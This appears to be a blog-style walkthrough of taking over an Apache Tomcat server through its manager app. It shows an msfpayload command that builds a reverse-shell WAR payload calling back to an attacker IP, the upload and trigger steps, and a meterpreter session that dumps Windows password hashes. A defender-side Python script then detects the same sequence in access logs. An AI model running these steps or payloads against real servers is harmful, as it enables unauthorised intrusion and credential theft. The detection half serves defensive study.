So, you’ve just brute-forced the admin password for the Tomcat web app manager and you want to take it a step further… enter Metasploit.
msfpayload can create a WAR file containing a payload, which you upload to the target through the manager and then trigger to get a session on the box.
```
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=4545 W > /root/MetRev.war
```
Log into the interface at http://192.168.1.112:8080/manager/html and upload the payload.
Once uploaded, you need to request the JSP file inside the deployed application; its (randomly generated) name can be found by listing the WAR's contents:
```
root@bt:~# unzip -l MetRev.war
Archive:  MetRev.war
  Length      Date    Time    Name
---------  ---------- -----   ----
       71  2011-05-22 19:06   META-INF/MANIFEST.MF
        0  2011-05-22 19:06   WEB-INF/
      267  2011-05-22 19:06   WEB-INF/web.xml
     1578  2011-05-22 19:06   nqaxmatvd.jsp
   147604  2011-05-22 19:06   jVfQFWuAPAToYS.txt
---------                     -------
   149520                     5 files
```
Start the meterpreter reverse_tcp handler and before you know it…
http://192.168.1.112:8080/MetRev/nqaxmatvd.jsp ROOT!!!!
```
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.109:4444
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.1.112
[*] Meterpreter session 1 opened (192.168.1.109:4444 -> 192.168.1.112:1084) at 2011-05-22 19:09:26 +0100
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SUPPORT_388945a0?:1001:aad3b435b51404eeaad3b435b51404ee:0849fe34e1da4ff869da83eb443e12e3:::
```
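The whole sequence above leaves a very recognisable trail in the Tomcat access log: a burst of 401s against `/manager/html`, a successful `POST /manager/html/upload`, and then the first request to a `.jsp` in a context that did not exist before the upload. The script below is an added defender-side example, not code from the post; it runs that detection over a few constructed log lines that mirror the walkthrough (the context name `MetRev` and `nqaxmatvd.jsp` are taken from the post, the other entries and timestamps are made up). It assumes the log uses Tomcat's default `common` access-log pattern (`%h %l %u %t "%r" %s %b`); the failure threshold of 5 is an arbitrary choice.

```python
import re
from collections import Counter

# Tomcat's default AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
# (assumption: the log uses that pattern; adjust the regex for other patterns).
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

# Deploy-by-upload action of the HTML manager application.
MANAGER_UPLOAD = "/manager/html/upload"

# Constructed sample log (not from the post): a legitimate JSP hit from another
# client, five failed manager logins, a successful login, a WAR upload, a request
# to a JSP in the new context, and a later hit to a context that already existed.
SAMPLE_LOG = """\
192.168.1.50 - - [22/May/2011:19:04:10 +0100] "GET /examples/jsp/index.jsp HTTP/1.1" 200 1200
192.168.1.109 - - [22/May/2011:19:05:01 +0100] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.109 - - [22/May/2011:19:05:02 +0100] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.109 - - [22/May/2011:19:05:02 +0100] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.109 - - [22/May/2011:19:05:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.109 - - [22/May/2011:19:05:03 +0100] "GET /manager/html HTTP/1.1" 401 2473
192.168.1.109 - admin [22/May/2011:19:05:10 +0100] "GET /manager/html HTTP/1.1" 200 11254
192.168.1.109 - admin [22/May/2011:19:06:30 +0100] "POST /manager/html/upload HTTP/1.1" 200 12430
192.168.1.109 - - [22/May/2011:19:08:55 +0100] "GET /MetRev/nqaxmatvd.jsp HTTP/1.1" 200 0
192.168.1.50 - - [22/May/2011:19:09:00 +0100] "GET /examples/jsp/dates.jsp HTTP/1.1" 200 900
""".splitlines()


def context_of(path):
    """Return the first path segment, i.e. the Tomcat context name ('' for /)."""
    parts = path.split("/")
    return parts[1] if len(parts) > 1 else ""


def analyse(lines, brute_threshold=5):
    """Return a list of alert strings for manager brute force, WAR upload and
    the first JSP request into a context that was not seen before the upload."""
    alerts = []
    failures = Counter()          # 401s against the manager app, per client
    baseline = set()              # contexts observed before any upload
    upload_seen = False
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue              # skip lines that do not fit the pattern
        host, user, method = m["host"], m["user"], m["method"]
        path = m["path"].split("?", 1)[0]   # drop query string (e.g. CSRF nonce)
        status = m["status"]

        if path.startswith("/manager") and status == "401":
            failures[host] += 1
            if failures[host] == brute_threshold:
                alerts.append(f"{host}: {brute_threshold} authentication failures "
                              "against the manager app")
            continue

        if method == "POST" and path == MANAGER_UPLOAD and status == "200":
            upload_seen = True
            alerts.append(f"{host}: WAR deployed through the manager app as user {user}")
            continue

        ctx = context_of(path)
        if upload_seen and ctx not in baseline and path.lower().endswith((".jsp", ".jspx")):
            alerts.append(f"{host}: JSP request in context /{ctx} not seen "
                          f"before the upload ({path})")
        if not upload_seen:
            baseline.add(ctx)     # only pre-upload contexts count as known-good
    return alerts


if __name__ == "__main__":
    for alert in analyse(SAMPLE_LOG):
        print(alert)
```

The baseline of "contexts seen before the upload" is what keeps the last line (a JSP in the pre-existing `/examples` context) from firing; in practice you would seed that baseline from the list of approved deployments rather than from the same log, and pair the alert with a check of what actually landed in the `webapps` directory.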